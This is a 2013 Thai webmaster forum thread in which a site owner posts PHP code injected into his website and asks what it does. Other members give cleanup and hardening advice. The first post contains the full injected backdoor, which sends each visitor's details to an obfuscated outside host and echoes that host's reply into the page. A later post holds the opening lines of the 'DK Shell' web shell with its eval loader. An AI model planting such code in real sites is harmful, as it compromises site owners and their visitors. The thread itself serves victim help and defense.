ยินดีต้อนรับคุณ, บุคคลทั่วไป กรุณา เข้าสู่ระบบ หรือ ลงทะเบียน

เข้าสู่ระบบด้วยชื่อผู้ใช้ รหัสผ่าน และระยะเวลาในเซสชั่น

ThaiSEOBoard.comความรู้ทั่วไปGeneral (ถามคุยวิชาการ IM)เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ
หน้า: [1]   ลงล่าง
พิมพ์
ผู้เขียน หัวข้อ: เหมือนเว็บโดนแฮค แล้วแอบใส่ code นี้เข้ามาครับ  (อ่าน 2607 ครั้ง)
0 สมาชิก และ 1 บุคคลทั่วไป กำลังดูหัวข้อนี้
muay5157
คนรักเสียว
*

พลังน้ำใจ: 23
ออฟไลน์ ออฟไลน์

กระทู้: 176



ดูรายละเอียด เว็บไซต์
« เมื่อ: 17 พฤษภาคม 2013, 10:00:15 »

โค๊ด:
<?php
if (!isset($sRetry))
{
global 
$sRetry;
$sRetry 1;
    
// This code use for global bot statistic
    
$sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    
$stCurlHandle NULL;
    
$stCurlLink "";
    if((
strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
    
{
        if(isset(
$_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        
$stCurlLink base64_decode'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @
$stCurlHandle curl_init$stCurlLink ); 
    }
    } 
if ( 
$stCurlHandle !== NULL )
{
    
curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
    
curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
    
$sResult = @curl_exec($stCurlHandle); 
    if (
$sResult[0]=="O"
     {
$sResult[0]=" ";
      echo 
$sResult// Statistic code end
      
}
    
curl_close($stCurlHandle); 
}
}
?>

อยากทราบว่า มันคือ code อะไรกัน กัน bot ให้วิ่งเข้ามา หรืออย่างไร? พอจะมีใครทราบมั้ยครับ

กลัวมากเลย เมื่อวานยังไม่มี วันนี้อยู่ๆก็มีขึ้นมา  wanwan035
บันทึกการเข้า

mesati.com ประกาศงานศพออนไลน์ เว็บไซต์งานศพ และ
พวงหรีด ที่ไฮเทคที่สุดในประเทศ (รางวัลจาก TICTA AWARDS 2011)

|ตู้สาขาโทรศัพท์
|กล้องวงจรปิด
flash
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 16
ออฟไลน์ ออฟไลน์

กระทู้: 1,022



ดูรายละเอียด เว็บไซต์
« ตอบ #1 เมื่อ: 17 พฤษภาคม 2013, 11:16:32 »

เห็นมีกระทู้ก่อนหน้าโดนแบบนี้เหมือนกัน แต่ไม่รู้ตอนนี้เจ้าของเค้าแก้ไขยังไงแล้ว ลองหาดูครับ
บันทึกการเข้า

ครีมหมอจุฬา ผ่าน อย. อยากหน้าใส ไร้รอยด่างดำ ครีมหมอจุฬาซื้อที่ไหน หาไม่ยากเลย แต่ระวังของปลอมนะ ของเราเป็น ครีมหมอจุฬาของแท้ 100% มาดูสินค้าก่อนได้

noohinter
Newbie
*

พลังน้ำใจ: 2
ออฟไลน์ ออฟไลน์

กระทู้: 26



ดูรายละเอียด
« ตอบ #2 เมื่อ: 17 พฤษภาคม 2013, 11:24:45 »

เคยโดนเหมือนกันแบบนี้ โดนยก host เลย มันมาแปะทุก file ที่เป็น index

ทางที่ดี ก็เปลี่ยน password cpanel แล้วก็ลง wordpress ใหม่เลยคะ
บันทึกการเข้า
Serge
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 202
ออฟไลน์ ออฟไลน์

กระทู้: 2,009



ดูรายละเอียด เว็บไซต์
« ตอบ #3 เมื่อ: 17 พฤษภาคม 2013, 11:45:00 »

ใช่เลยครับ Code นี้และ!! โดนเจาะแล้วๆๆๆๆๆ  wanwan009
บันทึกการเข้า

Herbraga ผลิตภัณฑ์เสริมอาหาร เหมาะสำหรับผู้ที่รักสุขภาพ
01111225
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 53
ออฟไลน์ ออฟไลน์

กระทู้: 1,114



ดูรายละเอียด เว็บไซต์
« ตอบ #4 เมื่อ: 17 พฤษภาคม 2013, 11:48:00 »

ลบโค้ดออก แล้วก็ เปลี่ยน pass  ftp เถอะเถ้าเจอแบบนี้ ติดตั้งโปรแกรม สแกนที่เครื่องตัวเองด้วย มันมาจากเครื่องของเรา โดยส่วนมาก
บันทึกการเข้า

TonRuk.com ยินดีตอนรับทุกท่านเกมส์ฟรี เว็บเรามีเกมส์ให้เล่นมากมายหลายแบบแล้วเรายังมีเกมส์ใหม่ ค้นรักของเรายังเป็นศูนย์รวมบันเทิงวาไรตี้ด้วยมาติดตามกันได้ที่อนิเมะ เรายังมีAnimeใหม่ๆแล้วยังมีเกมส์ที่ฮิตฮอตให้เล่นกันมากมายเลยเกมส์ฮิต ทุกอย่างฟรี ฟรีๆๆครับ ถ้าคุณดวงกำลังตกเข้ามาแก้ไขดวงเซ็คดวงชะตาได้เลยดูดวง กันฟรีๆๆไปเลย
siriyot00
สมุนแก๊งเสียว
*

พลังน้ำใจ: 34
ออฟไลน์ ออฟไลน์

กระทู้: 762



ดูรายละเอียด
« ตอบ #5 เมื่อ: 17 พฤษภาคม 2013, 11:57:25 »

หลักการทำงานของมัน น่าจะเป็นแบบนี้นะ ลองเข้าไป   Tongue

บันทึกการเข้า

Thaipromoteboard.com
treehost
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 99
ออฟไลน์ ออฟไลน์

กระทู้: 2,027



ดูรายละเอียด เว็บไซต์
« ตอบ #6 เมื่อ: 17 พฤษภาคม 2013, 12:05:38 »

อัพเดท  Wordpress  เป็นเวอร์ชั่นใหม่ล่าสุด ระวังโดน Hack กับ Backdoor-Linux นะครับ

ใครยังไม่อัพรีบอัพโดยด่วน  wanwan007 wanwan007 wanwan007

น้องผมลองมาแล้ว Wordpress เก่าๆ ใช้เวลาเจาะเข้าไปแก้ไฟล์ฐานข้อมูลภาย 30 วินาที

 wanwan004 wanwan004 wanwan004 wanwan004
« แก้ไขครั้งสุดท้าย: 17 พฤษภาคม 2013, 12:06:09 โดย treehost » บันทึกการเข้า

|(。◕‿‿◕。)| VPS SSD Raid-5 จัดโปรใจปล้ำ!.. ลด 20% แถมแรม 4GB ฟรี เริ่มต้นเพียง 700บาท
|(。◕‿‿◕。)| Line: @airwave |  ihotVPS
iak1
บุคคลทั่วไป
« ตอบ #7 เมื่อ: 17 พฤษภาคม 2013, 13:42:36 »

หลักการทำงานของมัน น่าจะเป็นแบบนี้นะ ลองเข้าไป   Tongue

http://www.youtube.com/watch?v=MEw53PwmfUA



Jump Domain มันสคิปหลอกเด็กของแก๊งนม หนิครับ    wanwan001
คลิปนี้ตาเล็กเอามาจำแหละ  แฉให้ดูการทำงาน
« แก้ไขครั้งสุดท้าย: 17 พฤษภาคม 2013, 13:44:40 โดย iak1 » บันทึกการเข้า
iteasy2u
สมุนแก๊งเสียว
*

พลังน้ำใจ: 31
ออฟไลน์ ออฟไลน์

กระทู้: 689



ดูรายละเอียด
« ตอบ #8 เมื่อ: 17 พฤษภาคม 2013, 13:52:50 »

ระวังกันให้มากๆนะครับ
บันทึกการเข้า

PAGE
Verified Seller
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 104
ออฟไลน์ ออฟไลน์

กระทู้: 2,368



ดูรายละเอียด
« ตอบ #9 เมื่อ: 17 พฤษภาคม 2013, 14:23:14 »

โดนแล้วครับ
บันทึกการเข้า

สิ่งที่ดีที่สุดในชีวิตคือความสงบ
kenessar
ก๊วนเสียว
*

พลังน้ำใจ: 34
ออฟไลน์ ออฟไลน์

กระทู้: 340



ดูรายละเอียด เว็บไซต์
« ตอบ #10 เมื่อ: 17 พฤษภาคม 2013, 14:53:19 »

base64_decode

นั่นปะไร

ลองหาปลั๊กอิน Wordpress Aniti Virus มาลงครับ แล้วสแกนเทมเพลท http://wordpress.org/extend/plugins/antivirus/
กับปลั๊กอิน Limit Login Attempt มาลงครับ http://wordpress.org/extend/plugins/limit-login-attempts/

แล้วเปลี่ยนรหัสผ่านเข้า FTP
บันทึกการเข้า
hatyaiwebdesign
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 60
ออฟไลน์ ออฟไลน์

กระทู้: 1,108



ดูรายละเอียด
« ตอบ #11 เมื่อ: 17 พฤษภาคม 2013, 15:57:23 »

base64_decode

ผมเห็นส่วนใหญ่มากับ theme เถื่อน
บันทึกการเข้า

songwutk
คนรักเสียว
*

พลังน้ำใจ: 5
ออฟไลน์ ออฟไลน์

กระทู้: 167



ดูรายละเอียด เว็บไซต์
« ตอบ #12 เมื่อ: 17 พฤษภาคม 2013, 18:23:28 »

base64_decode

ผมเห็นส่วนใหญ่มากับ theme เถื่อน

ทำให้ผมนึกถึง คลิป review cms atomymaxsite โดยคุณตาเล็ก windows 98se ครับ

**** แก้ข้อความ กลัวพาดพิงบางอย่างทำให้โดนระงับบัญชีเว็บนี้ ****
« แก้ไขครั้งสุดท้าย: 17 พฤษภาคม 2013, 18:26:16 โดย songwutk » บันทึกการเข้า

thaidevtalk.com | อาชีพเสริม : รับจ้าง config unmanaged linux vps
muay5157
คนรักเสียว
*

พลังน้ำใจ: 23
ออฟไลน์ ออฟไลน์

กระทู้: 176



ดูรายละเอียด เว็บไซต์
« ตอบ #13 เมื่อ: 17 พฤษภาคม 2013, 22:16:48 »

base64_decode

ผมเห็นส่วนใหญ่มากับ theme เถื่อน

เว็บนี้ ผมเขียน code สดเองหมดเลยครับ  มีแค่ บทความอย่างเดียว ที่ใช้ wordpress และ ก็เป็น หน้าแยก โดดๆด้วย ไม่เกี่ยวกับ Code โดยรวม
บันทึกการเข้า

mesati.com ประกาศงานศพออนไลน์ เว็บไซต์งานศพ และ
พวงหรีด ที่ไฮเทคที่สุดในประเทศ (รางวัลจาก TICTA AWARDS 2011)

|ตู้สาขาโทรศัพท์
|กล้องวงจรปิด
zidit
Verified Seller
เจ้าพ่อบอร์ดเสียว
*

พลังน้ำใจ: 314
ออฟไลน์ ออฟไลน์

กระทู้: 7,546



ดูรายละเอียด
« ตอบ #14 เมื่อ: 17 พฤษภาคม 2013, 23:10:33 »

ลบทิ้งครับ แล้วเปลี่ยนพาส

บันทึกการเข้า

muay5157
คนรักเสียว
*

พลังน้ำใจ: 23
ออฟไลน์ ออฟไลน์

กระทู้: 176



ดูรายละเอียด เว็บไซต์
« ตอบ #15 เมื่อ: 17 พฤษภาคม 2013, 23:50:09 »

ล่าสุด มีอันนี้ ด้วย ครับ

โค๊ด:
<?php 
//
//                                  DK Shell - Took the Best made it Better..!!
//
//
//
//Version 1.0 
//Created on 25/3/2012 by b47chguru
$auth_pass "81dc9bdb52d04dc20036dbd8313ed055" //password = dk 
$color "#00FF66"; //Colour
$default_action "FilesMan";
$default_charset "Windows-1251";
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65  

แถมต่อจากนี้ ยาวมากกกกก เซฟ ใส่ ข้อความ มาโพส ไม่หมดครับ  :X เคียดแค้นอะไรผมนักหนา -_-
« แก้ไขครั้งสุดท้าย: 17 พฤษภาคม 2013, 23:50:39 โดย muay5157 » บันทึกการเข้า

mesati.com ประกาศงานศพออนไลน์ เว็บไซต์งานศพ และ
พวงหรีด ที่ไฮเทคที่สุดในประเทศ (รางวัลจาก TICTA AWARDS 2011)

|ตู้สาขาโทรศัพท์
|กล้องวงจรปิด
makoto
หัวหน้าแก๊งเสียว
*

พลังน้ำใจ: 152
ออฟไลน์ ออฟไลน์

กระทู้: 1,443



ดูรายละเอียด เว็บไซต์
« ตอบ #16 เมื่อ: 18 พฤษภาคม 2013, 13:59:25 »

มาบอกวิธีครับ เคยโดนมาก่อน ปัจจุบันก็น้อยลงแล้วเหมือนอาการจะหายไปบางเว็บ แต่บางเว็บก็ยังคงแก้ไม่หาย ส่วนใหญ่เป็นที่ wordpress แต่ก็เคยเจอเว็บเขียนเองด้วย ถูกเพิ่ม code ลงไป

สาเหตุหลักคือ

1. เป็นที่ theme ฟรีที่มีแจก (ผมเคยเจอใน theme ที่ซื้อมาด้วย 1 อัน จึงคิดว่ามันน่าจะติดจากเว็บใน host เดียวกัน)
2. เป็นที่เว็บใน host เครื่องเดียวกัน อาจไม่ใช่เว็บเราที่เป็นตัวติดตัวแรก แต่มันจะเจาะเข้าทุกเว็บใน host เดียวกันทั้งหมด
3. แก้ pass เปลี่ยน user หรืออะไรก็แล้วแต่ มันก็ไม่หาย มันจะมาประมาณต้นๆ เดือด ฝังไว้ทุกๆ ไฟล์ใน index และไฟล์ที่มันเห็นว่าใช้งานได้ดี เช่น footer, header, single, slide หรือแม้แต่ไฟล์กากๆ อย่าง readme.html
4. มันจะฝัง script อย่างว่านั่นไปทุกๆ ไฟล์ในข้อ 3 (จุดสังเกตุคือ หากไปเจอไฟล์ไหนติด ดูวันที่สร้างไฟล์หรือวันที่ update แล้วจัดการลบไฟล์ทั้งหมดในวันที่ๆ มีการ update นั้นออกแล้วแทนที่ไฟล์อันใหม่เข้าไป)
5. จะมีไฟล์ counter.php ที่ถูกสร้างขึ้นเพื่อเป็นตัวเรียกใช้ ลบมันซะ
6. ในทุกๆ folder ควรตรวจสอบ แม้กระทั่งในแคช

วิธีแก้ ถ้าเว็บเราโดนเป็นตัวหลักและเป็นตัวกระจายไปสู่เว็บอื่น ให้เราลบไฟล์ทั้งหมด แล้ว upload ขึ้นไปใหม่ ไม่นานมันจะหายไปเอง แต่ถ้าเว็บเราไม่ใช่เว็บหลัก ยังไงก็แก้ไม่หายแม้จะเปลี่ยน user pass หรืออะไรก็ตาม ทางแก้ดีที่สุดคือ ย้าย hosting ไปไกลๆ จากผู้ให้บริการรายนี้

ิวิธีเอาตัวรอดไปแต่ละเดือน

1. ทำการแก้ไฟล์ config ให้ไปเรียกใช้ user pass ในไฟล์ใหม่ที่เราสร้างไว้ใน folder ใน cgi-bin แทน และเวลาเปลี่ยน pass มันจะง่ายสำหรับเรา แก้ไฟล์เดียวใช้ได้ทุกเว็บ กรณีใช้ pass อันเดียวกัน เช่น มี subdomain เพราะมันจะมาแน่ เดือนละครั้ง ทำจนกว่ามันจะขี้เกียจเข้ามาฝัง
2. เปลี่ยน pass ftp แล้วให้ทำการลบไฟล์ทุกไฟล์ที่เป็นชื่อ index.php (ในทุกๆ folder) ไม่ว่าไฟล์นั้นจะถูกฝังหรือไม่ได้ถูกฝัง
2. ตรวจดูวันที่ถูกแก้ไข จากไฟล์ที่ถูกฝังสคริปไว้ แล้ว search หาจากวันที่ คุณจะได้ไฟล์ตัวปัญหา
3. จัดการลบมันให้หมด และ upload ไฟล์ใหม่ที่สะอาดเข้าไปแทน (อย่าใช้การแทนที่ เพราะมันจะไม่แก้ปัญหานี้ให้กับคุณ) ทำทุก folder
4. ตั้ง chmod เป็น 444 ในทุกๆ ไฟล์ที่คุณ upload จากข้อ 3
5. เข้าไป update cmd ให้เป็นอันล่าสุดทันที และ upload plug-in ด้วย แม้ว่ามันจะเป็นอันล่าสุดแล้วก็ตาม

** ให้ลบไฟล์ที่โดนฝังออกก่อนนะครับ แล้วค่อย upload ขึ้นไปใหม่ ถ้าลากไฟล์ไป replace จะไม่หาย **

ทำไมผมถึงต้องบอกว่า ถ้าไม่ใช่เราติด ก็มาจากเว็บอื่นใน host เดียวกันทำให้เราติด แล้วทำไมถึงแก้ไม่หาย ก็ถ้าไม่ได้ไปลบไฟล์ต้นเหตุ แก้ยังไงก็ไม่หายหรอกครับ ทำได้แค่ลบๆ และลบ ขึ้นอยู่กับว่ามันจะมาบ่อยแค่ไหนเท่านั้น
อย่างแรกคือ ผมไปเจอบทความอันนึงของกลุ่ม UHT : Unlimited Hack Team เค้าระบุว่าสามารถเจาะ CMS แข็งๆ อย่าง wp ได้ง่ายๆ หากสามารถ upload shell ได้จาก host ไหนซักแห่งและสามารถเข้าถึงเว็บและไฟล์ได้ทุกไฟล์ใน host นั้น ยิ่งเป็นระบบ cPanel ยิ่งง่ายเพราะเค้าสอนกันโครมๆ ในการ hack ระบบพวกนี้

ถ้าขี้เกียจหรือไม่ได้จริงๆ แนะนำให้ย้าย host ครับ เพราะการลบและไป upload แค่ไฟล์ index.php ผมก็ว่าเครียดหนัก สำหรับผมมีในมือไม่กี่เว็บยังเหนื่อย ถ้ามีหลายเว็บนี่ถึงขั้นสาปส่งกันเลยทีเดียว

หลักการทำงานของ script ที่มันฝังไว้ ลองแกะดูคร่าวๆ ผมก็ไม่เก่งหรอก แต่ดูเหมือนเวลาเปิดเว็บในบางระบบของ browser มันจะบังคับให้เราติดตั้งหรือ active อะไรซักอย่างลงไป (ผมก็ยังไม่เคยลงกด ok) แล้วมันก็อาจจะได้ Traffic จากผู้ชมในเว็บเราไปใช้กับเว็บมันด้วย (อันนี้เดาเอานะ) และมันจะทำให้เว็บเราคนเข้าน้อยลงเรื่อยๆ เพราะอะไรก็ไม่รู้
« แก้ไขครั้งสุดท้าย: 18 พฤษภาคม 2013, 14:01:01 โดย makoto » บันทึกการเข้า

24Million
Newbie
*

พลังน้ำใจ: 2
ออฟไลน์ ออฟไลน์

กระทู้: 41



ดูรายละเอียด
« ตอบ #17 เมื่อ: 18 พฤษภาคม 2013, 14:48:51 »

...จะบอกว่าเมื่อก่อนผมเห็นเยอะมาก
เมื่อก่อนผมใช้ WP ชอบไปโหลดธีมไว้ ที่ผมเคยเห็น (เว็บผมเอง) จะมีลายเซ็นประเภทแกะไม่ออก ต้องเข้าไปแก้แบบนี้เหมือนกัน  Tongue

แต่ขนาดมัลแวร์นี่โชคดีไม่เคยโดนนะฮะ

เวลาโหลดธีมฟรี โดยเฉพาะไอ้ที่ (เถื่อน) แฮ็กธีมจ่ายตังค์ (พวกธีม Thesis อะไรงี้) ...ระวังให้มากๆ กันนะคับ
บันทึกการเข้า
kenessar
ก๊วนเสียว
*

พลังน้ำใจ: 34
ออฟไลน์ ออฟไลน์

กระทู้: 340



ดูรายละเอียด เว็บไซต์
« ตอบ #18 เมื่อ: 16 มิถุนายน 2013, 23:32:09 »

มาบอกวิธีครับ เคยโดนมาก่อน ปัจจุบันก็น้อยลงแล้วเหมือนอาการจะหายไปบางเว็บ แต่บางเว็บก็ยังคงแก้ไม่หาย ส่วนใหญ่เป็นที่ wordpress แต่ก็เคยเจอเว็บเขียนเองด้วย ถูกเพิ่ม code ลงไป

สาเหตุหลักคือ

1. เป็นที่ theme ฟรีที่มีแจก (ผมเคยเจอใน theme ที่ซื้อมาด้วย 1 อัน จึงคิดว่ามันน่าจะติดจากเว็บใน host เดียวกัน)
2. เป็นที่เว็บใน host เครื่องเดียวกัน อาจไม่ใช่เว็บเราที่เป็นตัวติดตัวแรก แต่มันจะเจาะเข้าทุกเว็บใน host เดียวกันทั้งหมด
3. แก้ pass เปลี่ยน user หรืออะไรก็แล้วแต่ มันก็ไม่หาย มันจะมาประมาณต้นๆ เดือด ฝังไว้ทุกๆ ไฟล์ใน index และไฟล์ที่มันเห็นว่าใช้งานได้ดี เช่น footer, header, single, slide หรือแม้แต่ไฟล์กากๆ อย่าง readme.html
4. มันจะฝัง script อย่างว่านั่นไปทุกๆ ไฟล์ในข้อ 3 (จุดสังเกตุคือ หากไปเจอไฟล์ไหนติด ดูวันที่สร้างไฟล์หรือวันที่ update แล้วจัดการลบไฟล์ทั้งหมดในวันที่ๆ มีการ update นั้นออกแล้วแทนที่ไฟล์อันใหม่เข้าไป)
5. จะมีไฟล์ counter.php ที่ถูกสร้างขึ้นเพื่อเป็นตัวเรียกใช้ ลบมันซะ
6. ในทุกๆ folder ควรตรวจสอบ แม้กระทั่งในแคช

วิธีแก้ ถ้าเว็บเราโดนเป็นตัวหลักและเป็นตัวกระจายไปสู่เว็บอื่น ให้เราลบไฟล์ทั้งหมด แล้ว upload ขึ้นไปใหม่ ไม่นานมันจะหายไปเอง แต่ถ้าเว็บเราไม่ใช่เว็บหลัก ยังไงก็แก้ไม่หายแม้จะเปลี่ยน user pass หรืออะไรก็ตาม ทางแก้ดีที่สุดคือ ย้าย hosting ไปไกลๆ จากผู้ให้บริการรายนี้

ิวิธีเอาตัวรอดไปแต่ละเดือน

1. ทำการแก้ไฟล์ config ให้ไปเรียกใช้ user pass ในไฟล์ใหม่ที่เราสร้างไว้ใน folder ใน cgi-bin แทน และเวลาเปลี่ยน pass มันจะง่ายสำหรับเรา แก้ไฟล์เดียวใช้ได้ทุกเว็บ กรณีใช้ pass อันเดียวกัน เช่น มี subdomain เพราะมันจะมาแน่ เดือนละครั้ง ทำจนกว่ามันจะขี้เกียจเข้ามาฝัง
2. เปลี่ยน pass ftp แล้วให้ทำการลบไฟล์ทุกไฟล์ที่เป็นชื่อ index.php (ในทุกๆ folder) ไม่ว่าไฟล์นั้นจะถูกฝังหรือไม่ได้ถูกฝัง
2. ตรวจดูวันที่ถูกแก้ไข จากไฟล์ที่ถูกฝังสคริปไว้ แล้ว search หาจากวันที่ คุณจะได้ไฟล์ตัวปัญหา
3. จัดการลบมันให้หมด และ upload ไฟล์ใหม่ที่สะอาดเข้าไปแทน (อย่าใช้การแทนที่ เพราะมันจะไม่แก้ปัญหานี้ให้กับคุณ) ทำทุก folder
4. ตั้ง chmod เป็น 444 ในทุกๆ ไฟล์ที่คุณ upload จากข้อ 3
5. เข้าไป update cmd ให้เป็นอันล่าสุดทันที และ upload plug-in ด้วย แม้ว่ามันจะเป็นอันล่าสุดแล้วก็ตาม

** ให้ลบไฟล์ที่โดนฝังออกก่อนนะครับ แล้วค่อย upload ขึ้นไปใหม่ ถ้าลากไฟล์ไป replace จะไม่หาย **

ทำไมผมถึงต้องบอกว่า ถ้าไม่ใช่เราติด ก็มาจากเว็บอื่นใน host เดียวกันทำให้เราติด แล้วทำไมถึงแก้ไม่หาย ก็ถ้าไม่ได้ไปลบไฟล์ต้นเหตุ แก้ยังไงก็ไม่หายหรอกครับ ทำได้แค่ลบๆ และลบ ขึ้นอยู่กับว่ามันจะมาบ่อยแค่ไหนเท่านั้น
อย่างแรกคือ ผมไปเจอบทความอันนึงของกลุ่ม UHT : Unlimited Hack Team เค้าระบุว่าสามารถเจาะ CMS แข็งๆ อย่าง wp ได้ง่ายๆ หากสามารถ upload shell ได้จาก host ไหนซักแห่งและสามารถเข้าถึงเว็บและไฟล์ได้ทุกไฟล์ใน host นั้น ยิ่งเป็นระบบ cPanel ยิ่งง่ายเพราะเค้าสอนกันโครมๆ ในการ hack ระบบพวกนี้

ถ้าขี้เกียจหรือไม่ได้จริงๆ แนะนำให้ย้าย host ครับ เพราะการลบและไป upload แค่ไฟล์ index.php ผมก็ว่าเครียดหนัก สำหรับผมมีในมือไม่กี่เว็บยังเหนื่อย ถ้ามีหลายเว็บนี่ถึงขั้นสาปส่งกันเลยทีเดียว

หลักการทำงานของ script ที่มันฝังไว้ ลองแกะดูคร่าวๆ ผมก็ไม่เก่งหรอก แต่ดูเหมือนเวลาเปิดเว็บในบางระบบของ browser มันจะบังคับให้เราติดตั้งหรือ active อะไรซักอย่างลงไป (ผมก็ยังไม่เคยลงกด ok) แล้วมันก็อาจจะได้ Traffic จากผู้ชมในเว็บเราไปใช้กับเว็บมันด้วย (อันนี้เดาเอานะ) และมันจะทำให้เว็บเราคนเข้าน้อยลงเรื่อยๆ เพราะอะไรก็ไม่รู้

ผมเคยโดนมาแล้วครับ แต่ไม่ใช่ iframe แต่เป็น Shell เลย
ตอนนั้น ใช้ Host Godaddy ผมเข้าผิดหน้า ปกติมันจะเข้า 404 แต่แปลก คราวนี้เข้าหน้าแปลกๆ สีดำ
ผมรู้เลยว่าผมโดนเข้าแล้ว ผมลองเล่นไอ้หน้าเพจนั้นดู ว่าจริงๆแล้วมันเป็นสคริปทีสามารถรัน Shell ได้

แล้วมันไม่ใช่แค่แฮ็คทุกเว็บในโฮสที่ผมเช่าครับ เท่าที่ลองเล่นดู ปรากฎว่า มันเข้าไปได้ทั้งโฮสเลย เอ้า เวรจริงๆ งี้ถ้าใครโดนแฮ็คซักเว็บนึง คนอื่นๆก็โดนด้วยสิครับ
บันทึกการเข้า
หน้า: [1]   ขึ้นบน
พิมพ์